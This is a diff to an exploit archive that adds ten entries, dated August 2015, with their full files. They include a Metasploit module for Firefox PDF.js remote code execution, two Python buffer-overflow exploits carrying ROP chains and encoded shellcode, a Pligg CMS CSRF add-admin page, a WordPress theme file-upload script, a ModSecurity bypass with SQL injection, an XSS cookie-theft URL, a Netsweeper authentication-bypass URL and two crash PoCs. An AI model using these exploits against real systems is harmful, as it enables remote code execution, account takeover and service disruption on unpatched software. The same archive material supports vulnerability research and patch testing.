DB: 2015-08-25

10 new exploits

files.csv

@@ -34083,6 +34083,9 @@ id,file,description,date,author,platform,type,port
 37754,platforms/php/webapps/37754.txt,"WordPress Candidate Application Form Plugin 1.0 - Arbitrary File Download",2015-08-10,"Larry W. Cashdollar",php,webapps,80
 37755,platforms/windows/local/37755.c,"Windows 2k3 SP2 - TCP/IP IOCTL Privilege Escalation (MS14-070)",2015-08-12,"Tomislav Paskalev",windows,local,0
 37947,platforms/multiple/remote/37947.txt,"LiteSpeed Web Server 'gtitle' parameter Cross Site Scripting Vulnerability",2012-03-12,K1P0D,multiple,remote,0
+37949,platforms/linux/remote/37949.txt,"ModSecurity POST Parameters Security Bypass Vulnerability",2012-10-17,"Bernhard Mueller",linux,remote,0
+37950,platforms/php/webapps/37950.txt,"jCore /admin/index.php path Parameter XSS",2012-10-17,"High-Tech Bridge",php,webapps,0
+37951,platforms/windows/remote/37951.py,"Easy File Sharing Web Server 6.9 - USERID Remote Buffer Overflow",2015-08-24,"Tracy Turben",windows,remote,0
 37757,platforms/multiple/webapps/37757.py,"Geoserver < 2.7.1.1 / < 2.6.4 / < 2.5.5.1 - XXE Exploit",2015-08-12,"David Bloom",multiple,webapps,0
 37758,platforms/win32/shellcode/37758.c,"Windows x86 - user32!MessageBox _Hello World!_ (199 Bytes Null-Free)",2015-08-12,noviceflux,win32,shellcode,0
 37759,platforms/linux/dos/37759.py,"NeuroServer 0.7.4 - (EEG TCP/IP Transceiver) Remote DoS",2015-08-12,nitr0us,linux,dos,0
@@ -34258,6 +34261,13 @@ id,file,description,date,author,platform,type,port
 37930,platforms/php/webapps/37930.txt,"Netsweeper 4.0.9 - Arbitrary File Upload And Execution",2015-08-21,"Anastasios Monachos",php,webapps,0
 37931,platforms/php/webapps/37931.txt,"Netsweeper 3.0.6 - Authentication Bypass",2015-08-21,"Anastasios Monachos",php,webapps,0
 37932,platforms/php/webapps/37932.txt,"Netsweeper 4.0.8 - Arbitrary File Upload and Execution",2015-08-21,"Anastasios Monachos",php,webapps,0
+37933,platforms/php/webapps/37933.txt,"Netsweeper 4.0.8 - Authentication Bypass",2015-08-21,"Anastasios Monachos",php,webapps,0
 37934,platforms/php/webapps/37934.txt,"WordPress Shopp Plugin Multiple Security Vulnerabilities",2012-10-05,T0x!c,php,webapps,0
 37935,platforms/php/webapps/37935.txt,"Interspire Email Marketer Cross Site Scripting_ HTML Injection_ and SQL Injection Vulnerabilities",2012-10-08,"Ibrahim El-Sayed",php,webapps,0
 37936,platforms/php/webapps/37936.txt,"Open Realty 'select_users_lang' Parameter Local File Include Vulnerability",2012-10-06,L0n3ly-H34rT,php,webapps,0
+37952,platforms/windows/remote/37952.py,"Easy Address Book Web Server 1.6 - USERID Remote Buffer Overflow",2015-08-24,"Tracy Turben",windows,remote,0
+37954,platforms/windows/dos/37954.py,"Mock SMTP Server 1.0 Remote Crash PoC",2015-08-24,"Shankar Damodaran",windows,dos,25
+37955,platforms/php/webapps/37955.html,"Pligg CMS 2.0.2 - CSRF Add Admin Exploit",2015-08-24,"Arash Khazaei",php,webapps,80
+37956,platforms/php/webapps/37956.txt,"WordPress GeoPlaces3 Theme - Arbitrary File Upload Vulnerbility",2015-08-24,Mdn_Newbie,php,webapps,80
+37957,platforms/windows/dos/37957.txt,"GOM Audio 2.0.8 - (.gas) Crash POC",2015-08-24,"_ Un_N0n _",windows,dos,0
+37958,platforms/multiple/remote/37958.rb,"Firefox PDF.js Privileged Javascript Injection",2015-08-24,metasploit,multiple,remote,0

platforms/linux/remote/37949.txt

@@ -0,0 +1,40 @@
+source: http://www.securityfocus.com/bid/56096/info
+
+ModSecurity is prone to a security-bypass vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+Successful exploits can allow attackers to bypass filtering rules; this may aid in further attacks.
+
+ModSecurity 2.6.8 is vulnerable; other versions may also be affected. 
+
+Proof of concept:
+-----------------
+
+wut.php:
+--------
+
+<? echo $POST[xxx] ?>
+
+
+POST request:
+-------------
+
+POST /wut.php HTTP/1.1
+Content-Type: multipart/form-data; boundary=A
+Content-Length: 161
+
+--A
+Content-Disposition: form-data; name="xxx"[\r][\r][\n]
+--A
+Content-Disposition: form-data; name="yyy"; filename="z"
+
+1 UNION SELECT 1,2,3,4,5,6,7,8,9,10--
+
+--A--
+
+
+Output:
+-------
+
+1 UNION SELECT 1,2,3,4,5,6,7,8,9,10--
+
+(any change in the header should produce a 403)d

platforms/multiple/remote/37958.rb

@@ -0,0 +1,257 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ManualRanking
+
+  include Msf::Exploit::Remote::BrowserExploitServer
+  include Msf::Exploit::Remote::FirefoxPrivilegeEscalation
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'        => 'Firefox PDF.js Privileged Javascript Injection',
+      'Description' => %q{
+        This module gains remote code execution on Firefox 35-36 by abusing a
+        privilege escalation bug in resource:// URIs. PDF.js is used to exploit
+        the bug. This exploit requires the user to click anywhere on the page to
+        trigger the vulnerability.
+      },
+      'Author'         => [
+        'Unknown', # PDF.js injection code was taken from a 0day
+        'Marius Mlynski', # discovery and pwn2own exploit
+        'joev'     # copypasta monkey, CVE-2015-0802
+      ],
+      'DisclosureDate' => "Mar 31 2015",
+      'License'     => MSF_LICENSE,
+      'References' =>
+        [
+          ['CVE', '2015-0816'], # pdf.js can load chrome://
+          ['CVE', '2015-0802']  # can access messageManager property in chrome window
+        ],
+      'Targets' => [
+        [
+          'Universal (Javascript XPCOM Shell)', {
+            'Platform' => 'firefox',
+            'Arch' => ARCH_FIREFOX
+          }
+        ],
+        [
+          'Native Payload', {
+            'Platform' => %w{ java linux osx solaris win },
+            'Arch'     => ARCH_ALL
+          }
+        ]
+      ],
+      'DefaultTarget' => 0,
+      'BrowserRequirements' => {
+        :source  => 'script',
+        :ua_name => HttpClients::FF,
+        :ua_ver  => lambda { |ver| ver.to_i.between?(35, 36) }
+      }
+    ))
+
+    register_options([
+      OptString.new('CONTENT', [ false, "Content to display inside the HTML <body>." ])
+    ], self.class)
+  end
+
+  def on_request_exploit(cli, request, target_info)
+    print_status('Sending exploit...')
+    send_response_html(cli, html)
+  end
+
+  def html
+    "<!doctype html><html><body>#{datastore['CONTENT'] || default_html}"+
+    "<script>#{js}</script></body></html>"
+  end
+
+  def default_html
+    "The page has moved. <span style='text-decoration:underline;'>Click here</span> to be redirected."
+  end
+
+  def js
+    key = Rex::Text.rand_text_alpha(5 + rand(12))
+    frame = Rex::Text.rand_text_alpha(5 + rand(12))
+    r = Rex::Text.rand_text_alpha(5 + rand(12))
+    opts = { key => run_payload } # defined in FirefoxPrivilegeEscalation mixin
+
+    <<-EOJS
+function xml2string(obj) {
+  return new XMLSerializer().serializeToString(obj);
+}
+
+function __proto(obj) {
+  return obj.__proto__.__proto__.__proto__.__proto__.__proto__.__proto__;
+}
+
+function get(path, callback, timeout, template, value) {
+  callback = _(callback);
+  if (template && value) {
+    callback = callback.replace(template, value);
+  }
+  js_call1 = 'javascript:' + _(function() {
+    try {
+      done = false;
+      window.onclick = function() {
+        if (done) { return; } done = true;
+        q = open("%url%", "q", "chrome,,top=-9999px,left=-9999px,height=1px,width=1px");
+        setTimeout(function(){
+          q.location='data:text/html,<iframe mozbrowser src="about:blank"></iframe>';
+
+            setTimeout(function(){
+              var opts = #{JSON.unparse(opts)};
+              var key = opts['#{key}'];
+              q.messageManager.loadFrameScript('data:,'+key, false);
+              setTimeout(function(){
+                q.close();
+              }, 100)
+            }, 100)
+        }, 100);
+      }
+    } catch (e) {
+      history.back();
+    }
+    undefined;
+  }, "%url%", path);
+  js_call2 = 'javascript:;try{updateHidden();}catch(e){};' + callback + ';undefined';
+  sandboxContext(_(function() {
+    p = __proto(i.contentDocument.styleSheets[0].ownerNode);
+    l = p.__lookupSetter__.call(i2.contentWindow, 'location');
+    l.call(i2.contentWindow, window.wrappedJSObject.js_call1);
+  }));
+  setTimeout((function() {
+    sandboxContext(_(function() {
+      p = __proto(i.contentDocument.styleSheets[0].ownerNode);
+      l = p.__lookupSetter__.call(i2.contentWindow, 'location');
+      l.call(i2.contentWindow, window.wrappedJSObject.js_call2);
+    }));
+  }), timeout);
+}
+
+function get_data(obj) {
+  data = null;
+  try {
+    data = obj.document.documentElement.innerHTML;
+    if (data.indexOf('dirListing') < 0) {
+      throw new Error();
+    }
+  } catch (e) {
+    if (this.document instanceof XMLDocument) {
+        data = xml2string(this.document);
+    } else {
+      try {
+          if (this.document.body.firstChild.nodeName.toUpperCase() == 'PRE') {
+              data = this.document.body.firstChild.textContent;
+          } else {
+              throw new Error();
+          }
+      } catch (e) {
+        try {
+          if (this.document.body.baseURI.indexOf('pdf.js') >= 0 || data.indexOf('aboutNetError') > -1) {;
+              return null;
+          } else {
+              throw new Error();
+          }
+        } catch (e) {
+          ;;
+        }
+      }
+    }
+  }
+  return data;
+}
+
+function _(s, template, value) {
+  s = s.toString().split(/^\\s*function\\s+\\(\\s*\\)\\s*\\{/)[1];
+  s = s.substring(0, s.length - 1);
+  if (template && value) {
+    s = s.replace(template, value);
+  }
+  s += __proto;
+  s += xml2string;
+  s += get_data;
+  s = s.replace(/\\s\\/\\/.*\\n/g, "");
+  s = s + ";undefined";
+  return s;
+}
+
+function get_sandbox_context() {
+  if (window.my_win_id == null) {
+    for (var i = 0; i < 20; i++) {
+      try {
+        if (window[i].location.toString().indexOf("view-source:") != -1) {
+          my_win_id = i;
+          break;
+        }
+      } catch (e) {}
+    }
+  };
+  if (window.my_win_id == null)
+    return;
+  clearInterval(sandbox_context_i);
+  object.data = 'view-source:' + blobURL;
+  window[my_win_id].location = 'data:application/x-moz-playpreview-pdfjs;,';
+  object.data = 'data:text/html,<'+'html/>';
+  window[my_win_id].frameElement.insertAdjacentHTML('beforebegin', '<iframe style='+
+    '"position:absolute; left:-9999px;" onload = "'+_(function(){
+    window.wrappedJSObject.sandboxContext=(function(cmd) {
+      with(importFunction.constructor('return this')()) {
+        return eval(cmd);
+      }
+    });
+  }) + '"/>');
+}
+
+var HIDDEN = 'position:absolute;left:-9999px;height:1px;width:1px;';
+var i = document.createElement("iframe");
+i.id = "i";
+i.style=HIDDEN;
+i.src = "data:application/xml,<?xml version=\\"1.0\\"?><e><e1></e1></e>";
+document.documentElement.appendChild(i);
+i.onload = function() {
+  if (this.contentDocument.styleSheets.length > 0) {
+    var i2 = document.createElement("iframe");
+    i2.id = "i2";
+    i2.style='opacity: 0;position:absolute;top:0;left:0;right:0;bottom:0;';
+    i2.height = window.innerHeight+'px';
+    i2.width = window.innerWidth+'px';
+    i2.src = "data:application/pdf,";
+    document.documentElement.appendChild(i2);
+    pdfBlob = new Blob([''], {
+        type: 'application/pdf'
+    });
+    blobURL = URL.createObjectURL(pdfBlob);
+    object = document.createElement('object');
+    object.style=HIDDEN;
+    object.data = 'data:application/pdf,';
+    object.onload = (function() {
+        sandbox_context_i = setInterval(get_sandbox_context, 200);
+        object.onload = null;
+        object.data = 'view-source:' + location.href;
+        return;
+    });
+    document.documentElement.appendChild(object);
+  } else {
+    this.contentWindow.location.reload();
+  }
+}
+
+document.body.style.height = window.innerHeight+'px';
+
+var kill = setInterval(function() {
+  if (window.sandboxContext) {
+    var f = "chrome://browser/content/browser.xul";
+    get(f, function() {}, 0, "%URL%", f);
+    clearInterval(kill);
+  } else {
+    return;
+  }
+},20);
+
+EOJS
+  end
+end

platforms/php/webapps/37933.txt

@@ -0,0 +1,38 @@
++-----------------------------------------------------------------+
++ Netsweeper 4.0.8 - Authentication Bypass (New Profile Creation) +
++-----------------------------------------------------------------+
+Affected Product: Netsweeper
+Vendor Homepage : www.netsweeper.com
+Version 	: 4.0.8 (and probably other versions)
+Discovered by  	: Anastasios Monachos (secuid0) - [anastasiosm (at) gmail (dot) com]
+Patched      	: Yes
+CVE		: CVE-2014-9618
+
++---------------------+
++ Product Description +
++---------------------+
+Netsweeper is a software solution specialized in content filtering.
+
++----------------------+
++ Exploitation Details +
++----------------------+
+Netsweeper's 4.0.8 (and probably other versions) Client Filter Admin portal can be reached at http://netsweeper/webadmin/clientlogin/ and a username/password combination is required to Add a Profile, by setting the "action" parameter to "showdeny" it will force the admin interface to load and subsequently allow any non-authenticated user to create a new profile.
+
+URL Path: http://netsweeper/webadmin/clientlogin/?srid=&action=showdeny&url=
+
++----------+
++ Solution +
++----------+
+Upgrade to latest version.
+
++---------------------+
++ Disclosure Timeline +
++---------------------+
+24-Nov-2014: Initial Communication
+03-Dec-2014: Netsweeper responded
+03-Dec-2014: Shared full details to replicate the issue
+10-Dec-2014: Netsweeper fixed the issue in releases 3.1.10, 4.0.9, 4.1.2
+17-Dec-2014: New releases 3.1.10, 4.0.9, 4.1.2 made available to the public
+18-Dec-2014: Confirm fix
+17-Jan-2015: CVE assigned CVE-2014-9618
+11-Aug-2015: Public disclosure

platforms/php/webapps/37950.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/56102/info
+
+jCore is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may exploit these issues to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+jCore 1.0pre and prior versions are vulnerable. 
+
+http://www.example.com/admin/?path=%27%20onmouseover%3dalert%28document.cookie%29%20%27 

platforms/php/webapps/37955.html

@@ -0,0 +1,57 @@
+<!--
+# Exploit Title: Pligg CMS CSRF Add Admin Exploit
+# Google Dork: intext:"Made wtih Pligg CMS"
+# Date: 2015/8/20
+# Exploit Author: Arash Khazaei
+# Vendor Homepage: http://pligg.com
+# Software Link:
+https://github.com/Pligg/pligg-cms/releases/download/2.0.2/2.0.2.zip
+# Version: 2.0.2
+# Tested on: Kali , Iceweasel Browser
+# CVE : CVE-2015-6655
+# Contact : http://twitter.com/0xClay
+# Mail : 0xclay@gmail.com
+# Site : http://bhunter.ir
+
+# Description :
+
+# Pligg CMS Is A CMS Written In PHP Language And Licensed Under GPL V 2.0
+# In Pligg CMS Panel In Adding Users Section Pligg CMS Allow To Attacker
+Add Admin By CSRF
+# Vulnerability In Add Users Sections . Another Thing Is Added Admin By
+CSRF Vulnerability
+# Can't Deleted By Admin :) And Admin Should Delete It From Database .
+
+# Exploit :
+-->
+<body onload="document.exploit.submit();">
+<form action="http://localhost/pligg-cms-master/admin/admin_users.php"
+method="post" id="createUserForm" name="exploit" onsubmit="return
+checkValidation()">
+<input name="username" type="text" class="form-control" id="username"
+value="hacker"  onchange="checkUsername(this.value)" />
+<input name="email" type="text" class="form-control" id="email" value="
+hacker@hacker.com" onchange="checkEmail(this.value)"/>
+<select name="level">
+<option value="admin">Admin</option>
+</select>
+<input name="password" type="text" class="form-control" id="password"
+value="hacker123" onchange="checkPassword(this.value)"/>
+<input type="hidden" name="mode" value="newuser">
+<input type="submit" class="btn btn-primary" value="Create User"/>
+
+</form>
+<!--
+
+Timeline :
+21/5/2015 Reported To Developer Team .
+22/5/2015 No Responde From Developer Team.
+22/5/2015 Request CVE
+23/5/2015 Published Vulnerability
+
+
+# Note: Change The Values Of Exploit To Another Thing :)
+
+# Discovered By Arash Khazaei . (Aka JunkyBoy (Nick Name Changed :P ))
+
+-->

platforms/php/webapps/37956.txt

@@ -0,0 +1,38 @@
+##################################################################################
+
+# Description : Wordpress Themes GeoPlaces3 - Arbitrary File Upload vulnerbility
+# Google Dork: inurl:/wp-content/themes/GeoPlaces3/
+# Date: 23 August 2015
+# Vendor Homepage: http://templatic.com/app-themes/geo-places-city-directory-wordpress-theme
+# Tested on: Win 7 & Win 8.1
+# Author: Mdn_Newbie | Gantengers Crew 
+# https://forum.gantengers-crew.org/
+
+##################################################################################
+
+Exploit : wp-content/themes/GeoPlaces3/library/includes/upload.php
+	  wp-content/themes/GeoPlaces3/library/includes/upload_3feb.php
+
+Path 	: /wp-content/uploads/tmp/
+
+
+<?php
+ 
+$uploadfile="m.jpg";
+$ch = 
+curl_init("https://server/wp-content/themes/GeoPlaces3/library/includes/upload.php");
+curl_setopt($ch, CURLOPT_POST, true);
+curl_setopt($ch, CURLOPT_POSTFIELDS,
+         array('Filedata'=>"@$uploadfile"));
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+$postResult = curl_exec($ch);
+curl_close($ch);
+print "$postResult";
+ 
+?>
+
+
+
+WE ARE : SultanHaikal - d3b~X - Brian Kamikaze - Coupdegrace - Mdn_newbie - Index Php 
+
+GREETS TO: Gantengers Crew - Indonesian Defacer - Indonesian Cyber Army - Defacer Tersakiti Team - Suram Crew - Surabaya BlackHat - AND All Moeslim Defacer

platforms/windows/dos/37954.py

@@ -0,0 +1,92 @@
+#!/usr/bin/python
+# Exploit Title: Mock SMTP Server 1.0 Remote Crash PoC
+# Date: 23-08-2015
+# Exploit Author: Shankar Damodaran
+# Author's Twitter : @sh4nx0r
+# Vendor Homepage: http://mocksmtpserver.codeplex.com
+# Software Link: http://mocksmtpserver.codeplex.com/downloads/get/87077
+# Version: 1.0
+# Tested on: Microsoft Windows 7 Home Premium Service Pack 1
+# Tested on: Microsoft Windows XP Professional SP3
+# Image PoC : http://i.imgur.com/lp7NHTm.png
+
+
+# The Stack Trace from Microsoft Windows XP Professional SP3
+'''
+The Exception occured on EBX Register (E0434F4D)
+
+The Registers during the crash
+
+EAX 03BAF618
+ECX 00000000
+EDX 00000028
+EBX E0434F4D
+ESP 03BAF614
+EBP 03BAF668
+ESI 03BAF6A4
+EDI 001DFF28
+EIP 7C812FD3 KERNEL32.7C812FD3
+C 0  ES 0023 32bit 0(FFFFFFFF)
+P 0  CS 001B 32bit 0(FFFFFFFF)
+A 0  SS 0023 32bit 0(FFFFFFFF)
+Z 0  DS 0023 32bit 0(FFFFFFFF)
+S 0  FS 003B 32bit 7FFD6000(FFF)
+T 0  GS 0000 NULL
+D 0
+O 0  LastErr WSAECONNRESET (00002746)
+EFL 00000202 (NO,NB,NE,A,NS,PO,GE,G)
+ST0 empty
+ST1 empty
+ST2 empty
+ST3 empty
+ST4 empty
+ST5 empty
+ST6 empty
+ST7 empty
+               3 2 1 0      E S P U O Z D I
+FST 0000  Cond 0 0 0 0  Err 0 0 0 0 0 0 0 0  (GT)
+FCW 027F  Prec NEAR,53  Mask    1 1 1 1 1 1
+
+Courtesy : Immunity Debugger
+
+'''
+
+
+
+import socket
+
+# Preparing a junk array with two NOPS.
+junk_bed=["\x90","\x90"]
+
+# The ip address of the remote host
+smtphost = '192.168.1.7'
+
+# The port of the remote host
+smtpport = 25
+
+for junk in junk_bed:
+	
+	# Initialize the socket stream
+	s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+	
+	# Setting a 5 second tolerance limit to check the server uptime
+	s.settimeout(5)
+	
+	# Connecting to the remote service.
+	s.connect((smtphost,smtpport))
+
+	# If the server doesn't respond, means its crashed.
+    	try:
+		s.recv(1)
+	except socket.timeout:
+		print "The SMTP Server has been crashed."
+		quit()
+	
+	# Sending the evil input
+	print "Evil Input Sent...Triggering a crash."
+	s.send('\r\n'+junk+'\r\n')
+
+	# Close the connection socket
+	s.close()
+
+# End of PoC - Shankar Damodaran

platforms/windows/dos/37957.txt

@@ -0,0 +1,23 @@
+********************************************************************************************
+# Exploit Title: GOM Audio 2.0.8 Crash POC
+# Date: 8/24/2015
+# Exploit Author: Un_N0n
+# Software Vendor : http://audio.gomlab.com/
+# Software Link: http://audio.gomlab.com/download_log.gom
+# Version: 2.0.8 (2015/06/17)
+# Tested on: Windows 7 x86(32 BIT)
+********************************************************************************************
+
+[Steps to Produce the Crash]:
+1- open 'Goma.exe'.
+2- Goto Preference -> Manage -> Skins.
+3- Click on ADD, Browse CRASH.gas in it.
+~ Software will Crash.
+
+[Code to produce crash.txt]: 
+junk = "A"*66666
+file = open("CRASH.gas",'w')
+file.write(junk)
+file.close()
+**********************************************************************************************
+

platforms/windows/remote/37951.py

@@ -0,0 +1,94 @@
+#!/usr/bin/python
+# Exploit Title: Easy File Sharing Web Server v6.9 - USERID Remote Buffer Overflow 
+# Version:       6.9
+# Date:          2015-08-22
+# Author:        Tracy Turben (tracyturben@gmail.com)
+# Software Link: http://www.efssoft.com/
+# Tested on:     Win7x32-EN,Win7x64-EN
+# Special Thanks To: Julien Ahrens for the crafted jmp esp Trick ;) 
+# Credits for vulnerability discovery:
+# superkojiman (http://www.exploit-db.com/exploits/33453/)
+
+
+from struct import pack
+import socket,sys
+import os
+  
+host="192.168.1.15"
+port=80
+  
+junk0 = "\x90" * 80
+ 
+
+# 0x1001d89b : {pivot 604 / 0x25c} # POP EDI # POP ESI # POP EBP # POP EBX # ADD ESP,24C # RETN [ImageLoad.dll] 
+# The memory located at 0x1001D8F0: "\x7A\xD8\x01\x10" does the job!
+# Due to call dword ptr [edx+28h]: 0x1001D8F0 - 28h = 0x1001D8C8
+call_edx=pack('<L',0x1001D8C8) 
+ 
+junk1="\x90" * 396
+ppr=pack('<L',0x10010101) # POP EBX # POP ECX # RETN [ImageLoad.dll]
+ 
+# Since 0x00 would break the exploit 00520498 PUSH ESP needs to be crafted on the stack.
+crafted_jmp_esp=pack('<L',0xA4523C15)
+
+
+test_bl=pack('<L',0x10010125) # contains 00000000 to pass the JNZ instruction
+ 
+kungfu=pack('<L',0x10022aac)  # MOV EAX,EBX # POP ESI # POP EBX # RETN [ImageLoad.dll]
+kungfu+=pack('<L',0xDEADBEEF) # filler
+kungfu+=pack('<L',0xDEADBEEF) # filler
+kungfu+=pack('<L',0x1001a187) # ADD EAX,5BFFC883 # RETN [ImageLoad.dll] # finish crafting JMP ESP
+kungfu+=pack('<L',0x1002466d) # PUSH EAX # RETN [ImageLoad.dll]
+ 
+nopsled="\x90" * 20
+ 
+# windows/exec CMD=calc.exe 
+# Encoder: x86/shikata_ga_nai
+# powered by Metasploit 
+# msfpayload windows/exec CMD=calc.exe R | msfencode -b '\x00\x0a\x0d'
+ 
+shellcode=("\xda\xca\xbb\xfd\x11\xa3\xae\xd9\x74\x24\xf4\x5a\x31\xc9" +
+"\xb1\x33\x31\x5a\x17\x83\xc2\x04\x03\xa7\x02\x41\x5b\xab" +
+"\xcd\x0c\xa4\x53\x0e\x6f\x2c\xb6\x3f\xbd\x4a\xb3\x12\x71" +
+"\x18\x91\x9e\xfa\x4c\x01\x14\x8e\x58\x26\x9d\x25\xbf\x09" +
+"\x1e\x88\x7f\xc5\xdc\x8a\x03\x17\x31\x6d\x3d\xd8\x44\x6c" +
+"\x7a\x04\xa6\x3c\xd3\x43\x15\xd1\x50\x11\xa6\xd0\xb6\x1e" +
+"\x96\xaa\xb3\xe0\x63\x01\xbd\x30\xdb\x1e\xf5\xa8\x57\x78" +
+"\x26\xc9\xb4\x9a\x1a\x80\xb1\x69\xe8\x13\x10\xa0\x11\x22" +
+"\x5c\x6f\x2c\x8b\x51\x71\x68\x2b\x8a\x04\x82\x48\x37\x1f" +
+"\x51\x33\xe3\xaa\x44\x93\x60\x0c\xad\x22\xa4\xcb\x26\x28" +
+"\x01\x9f\x61\x2c\x94\x4c\x1a\x48\x1d\x73\xcd\xd9\x65\x50" +
+"\xc9\x82\x3e\xf9\x48\x6e\x90\x06\x8a\xd6\x4d\xa3\xc0\xf4" +
+"\x9a\xd5\x8a\x92\x5d\x57\xb1\xdb\x5e\x67\xba\x4b\x37\x56" +
+"\x31\x04\x40\x67\x90\x61\xbe\x2d\xb9\xc3\x57\xe8\x2b\x56" +
+"\x3a\x0b\x86\x94\x43\x88\x23\x64\xb0\x90\x41\x61\xfc\x16" +
+"\xb9\x1b\x6d\xf3\xbd\x88\x8e\xd6\xdd\x4f\x1d\xba\x0f\xea" +
+"\xa5\x59\x50")
+ 
+payload=junk0 + call_edx + junk1 + ppr + crafted_jmp_esp + test_bl + kungfu + nopsled + shellcode
+ 
+buf="GET /vfolder.ghp HTTP/1.1\r\n"
+buf+="User-Agent: Mozilla/4.0\r\n"
+buf+="Host:" + host + ":" + str(port) + "\r\n"
+buf+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
+buf+="Accept-Language: en-us\r\n"
+buf+="Accept-Encoding: gzip, deflate\r\n"
+buf+="Referer: http://" + host + "/\r\n"
+buf+="Cookie: SESSIONID=1337; UserID=" + payload + "; PassWD=;\r\n"
+buf+="Conection: Keep-Alive\r\n\r\n"
+  
+print "[*] Connecting to Host " + host + "..."
+ 
+s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+try:
+    connect=s.connect((host, port))
+    print "[*] Connected to " + host + "!"
+except:
+    print "[!] " + host + " didn't respond\n"
+    sys.exit(0)
+     
+print "[*] Sending malformed request..."
+s.send(buf)
+ 
+print "[!] Exploit has been sent!\n"
+s.close()

platforms/windows/remote/37952.py

@@ -0,0 +1,72 @@
+#!/usr/bin/python
+# Exploit Title: Easy Address Book Web Server 1.6 - USERID Remote Buffer Overflow 
+# Version:       1.6
+# Date:          2015-08-23
+# Author:        Tracy Turben (tracyturben@gmail.com)
+# Software Link: http://www.efssoft.com/
+# Tested on:     Win7x32-EN,Win7x64-EN
+
+
+from struct import pack
+import socket,sys
+import os
+  
+host="192.168.1.15"
+port=80
+  
+nopsled0 = "A" * 80 
+
+EDX = pack('<L',0x1001AFB8) # 1001AFE0 - 28 = 1001AFB8  JG SHORT 1001AF91 to MOV EAX,EBX POP EBP POP EBX RETN Return to Shellcode   
+
+nopsled1="\x90" * 20
+
+extraroom = "\x90" * 780 
+# windows/exec CMD=calc.exe 
+# Encoder: x86/shikata_ga_nai
+# bad characters '\x00\x0a\x0d'
+
+shellcode=("\xda\xca\xbb\xfd\x11\xa3\xae\xd9\x74\x24\xf4\x5a\x31\xc9" +
+"\xb1\x33\x31\x5a\x17\x83\xc2\x04\x03\xa7\x02\x41\x5b\xab" +
+"\xcd\x0c\xa4\x53\x0e\x6f\x2c\xb6\x3f\xbd\x4a\xb3\x12\x71" +
+"\x18\x91\x9e\xfa\x4c\x01\x14\x8e\x58\x26\x9d\x25\xbf\x09" +
+"\x1e\x88\x7f\xc5\xdc\x8a\x03\x17\x31\x6d\x3d\xd8\x44\x6c" +
+"\x7a\x04\xa6\x3c\xd3\x43\x15\xd1\x50\x11\xa6\xd0\xb6\x1e" +
+"\x96\xaa\xb3\xe0\x63\x01\xbd\x30\xdb\x1e\xf5\xa8\x57\x78" +
+"\x26\xc9\xb4\x9a\x1a\x80\xb1\x69\xe8\x13\x10\xa0\x11\x22" +
+"\x5c\x6f\x2c\x8b\x51\x71\x68\x2b\x8a\x04\x82\x48\x37\x1f" +
+"\x51\x33\xe3\xaa\x44\x93\x60\x0c\xad\x22\xa4\xcb\x26\x28" +
+"\x01\x9f\x61\x2c\x94\x4c\x1a\x48\x1d\x73\xcd\xd9\x65\x50" +
+"\xc9\x82\x3e\xf9\x48\x6e\x90\x06\x8a\xd6\x4d\xa3\xc0\xf4" +
+"\x9a\xd5\x8a\x92\x5d\x57\xb1\xdb\x5e\x67\xba\x4b\x37\x56" +
+"\x31\x04\x40\x67\x90\x61\xbe\x2d\xb9\xc3\x57\xe8\x2b\x56" +
+"\x3a\x0b\x86\x94\x43\x88\x23\x64\xb0\x90\x41\x61\xfc\x16" +
+"\xb9\x1b\x6d\xf3\xbd\x88\x8e\xd6\xdd\x4f\x1d\xba\x0f\xea" +
+"\xa5\x59\x50")
+ 
+payload=nopsled0 + EDX + nopsled1 + shellcode + extraroom
+ 
+buf="GET //addrbook.ghp? HTTP/1.1\r\n"
+buf+="User-Agent: Mozilla/4.0\r\n"
+buf+="Host:" + host + ":" + str(port) + "\r\n"
+buf+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
+buf+="Accept-Language: en-us\r\n"
+buf+="Accept-Encoding: gzip, deflate\r\n"
+buf+="Referer: http://" + host + "/\r\n"
+buf+="Cookie: SESSIONID=1337; UserID=" + payload + "; PassWD=;\r\n"
+buf+="Conection: Keep-Alive\r\n\r\n"
+  
+print "[*] Connecting to Host " + host + "..."
+ 
+s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+try:
+    connect=s.connect((host, port))
+    print "[*] Connected to " + host + "!"
+except:
+    print "[!] " + host + " didn't respond\n"
+    sys.exit(0)
+     
+print "[*] Sending malformed request..."
+s.send(buf)
+ 
+print "[!] Exploit has been sent!\n"
+s.close()